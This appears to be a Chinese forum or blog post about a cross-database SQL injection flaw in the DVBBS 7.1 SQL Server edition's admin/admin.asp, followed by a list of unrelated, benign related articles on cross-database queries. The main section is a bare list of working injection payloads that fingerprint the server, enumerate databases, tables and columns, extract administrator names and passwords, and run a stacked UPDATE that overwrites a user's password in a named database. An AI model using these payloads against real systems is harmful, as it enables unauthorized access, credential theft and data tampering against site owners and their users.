DVBBS7.1 SQL版 跨库漏洞

漏洞测试环境:DVBBS7.1 SQL

受影响文件

admin/admin.asp

.....

漏洞利用

(select @@version)>0 获得Windows的版本号

and user_name()='dbo' 判断当前系统的连接用户是不是sa

(select user_name())>0 爆当前系统的连接用户

(select db_name())>0 得到当前连接的数据库

(select IS_MEMBER('db_owner')) --查询数据库当前用户权限

(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查询所有数据库名

(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') --查询数据库表名

(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin')) --查询数据库所有表名

(select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) --查询表名ID

(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名

(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname')) --查询所有字段名

(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户

(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -查询用户bluefire密码

;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--

(0)

相关推荐

  • DVBBS7.1 SQL版 跨库漏洞

    漏洞测试环境:DVBBS7.1 SQL 受影响文件 admin/admin.asp ..... 漏洞利用 (select @@version)>0 获得Windows的版本号 and user_name()='dbo' 判断当前系统的连接用户是不是sa (select user_name())>0 爆当前系统的连接用户 (select db_name())>0 得到当前连接的数据库 (select IS_MEMBER('db_owner')) --查询数据库当前用户权限 (select 

  • SQL Server 跨库同步数据

    SQL Server 跨库同步数据

    最近有个需求是要跨库进行数据同步,两个数据库分布在两台物理计算机上,自动定期同步可以通过SQL Server代理作业来实现,但是前提是需要编写一个存储过程来实现同步逻辑处理.这里的存储过程用的不是opendatasource,而是用的链接服务器来实现的.存储过程创建在IP1:192.168.0.3服务器上,需要将视图v_custom的客户信息同步到IP2:192.168.0.10服务器上的t_custom表中.逻辑是如果不存在则插入,存在则更新字段. create PROCEDURE [dbo]

  • C#实现定义一套中间SQL可以跨库执行的SQL语句(案例详解)

    目录 hisql查询样例 单表查询 group by查询 having 查询 join 多表查询 分页 hisql 实现参数化 链式查询 hisql语句和链式查询混用 目前数据的种类非常多,每种数据都支持sql语句,但是大家发现没有每种数据的SQL都有自己的语法特性,都是SQL语句都没有一个特定的语法标准,导致开发人员在开发的过程中无法任意选库(如果用自己不熟的库都会要学习一遍SQL语法),主要是学习成本太高 那么有没有一种工具能够统一下sql语法规则,只要学一种sql语句就可以跨库执行,让开发

  • SQL Server实现跨库跨服务器访问的方法

    前言 我们经常会遇到一个数据库要访问另一个数据库,或者一台服务器要访问另一台服务器里面的数据库. 那么这个如何实现的呢? 相信看完这篇文章你就懂了! 同一台服务器跨库访问实现 1. 首先创建两个数据库CrossLibraryTable1,CrossLibraryTable2 --创建CrossLibraryTable1脚本: use master --打开master数据库,一般的创建语句都在master中执行. go if exists (select * from sysdatabases

  • PostgreSQL中使用dblink实现跨库查询的方法

    PostgreSQL中使用dblink实现跨库查询的方法

    最近一个sql语句涉及到跨库的表之间的联合查询,故研究学习下. 一开始研究知道了sql语句的写法,但是执行通过不了,需要先安装dblink扩展.这些博文里都没说清楚,感谢网友指点,在windows下只需要在相应的数据库下执行sql语句"create extension dblink"就ok了.而以上的博文基本上说的都是linux下的操作方法,也因此我走了弯路. 2.下载了PostgreSQL的源代码,却不知道语句在哪执行,貌似是在linux下的shell里执行的,我却在psql和cmd

  • Oracle 跨库 查询 复制表数据 分布式查询介绍

    方法一: 在目前绝大部分数据库有分布式查询的需要.下面简单的介绍如何在oracle中配置实现跨库访问. 比如现在有2个数据库服务器,安装了2个数据库.数据库server A和B.现在来实现在A库中访问B的数据库. 第一步.配置A服务器端的tnsnames.ora文件(TNSNAMES.ORA Network Configuration File),该文件存放的位置为: $ORACLE_HOME/network/admin/tnsnames.ora 添加如下行,其中DBLINK为连接名(可自定义)

  • php结合ACCESS的跨库查询功能

    问题说明: 有时需要在两个或三个数据库的表中,通过相关关键字,查询获取所需记录集,用一般的SQL查询语句是实现不了的,可通过ACCESS的跨库查询功能实现. 解决方法: 例如"装材类型"和"装材"两张表是在不同的数据库中的,具体查询方法,如下: 复制代码 代码如下: @"Select * from 装材类型 as a INNER JOIN [;database=" AppDomain.CurrentDomain.BaseDirectory &qu

  • Access的跨库查询 (图)

    Access的跨库查询 (图)

    大家还记得mssql的跨库查询吧,其实在access中也可以实现2个数据之间的交叉查询.下面我就给大家介绍下access的跨库查询. 首先让我们看看在access里是怎样实现对mdb文件进行查询的,我们随便创建个空数据库,对数据库D:\daos\db\daidalos.mdb里的admin表的内容进行查询,SQL语句为: javascript:if(this.width>500)this.width=500" border=0> 查询后,成功返回目标数据库里表admin表里的内容:

  • MySQL中进行跨库查询的方法示例

    前言 在MySQL中跨库查询主要分为两种情况,一种是同服务的跨库查询:另一种是不同服务的跨库查询:它们进行跨库查询是不同的,下面就具体介绍这两种跨库查询. 一.同服务的跨库查询 同服务的跨库查询只需要在关联查询的时候带上数据名,SQL的写法是这样的:SELECT * FROM 数据库1.table1 x JOIN 数据库2.table2 y ON x.field1=y.field2:例如: 二.不同服务的跨库查询 不同服务的跨库查询,直接通过数据名加表明是无法进行关联的,这里需要用到MySQL数

  • 通过PLSQL Developer创建Database link,DBMS_Job,Procedure,实现Oracle跨库传输数据的方法(推荐)

    前一阵领导安排了一个任务:定时将集团数据库某表的数据同步至我们公司服务器的数据库,感觉比写增删改查SQL有趣,特意记录下来,希望能帮到有类似需求的小伙伴,如有错误也希望各位不吝指教 环境描述: 集团数据库:Oracle 11g 部门数据库:Oracle 11g 使用的软件:PLSQL Developer 13 网络环境:两个数据库处于同一局域网 先讲一下完成此任务需要用到哪些技术: Database link:使用户可以通过一个数据库访问到另外一个远程数据库 DBMS_Job:使ORACLE数据

随机推荐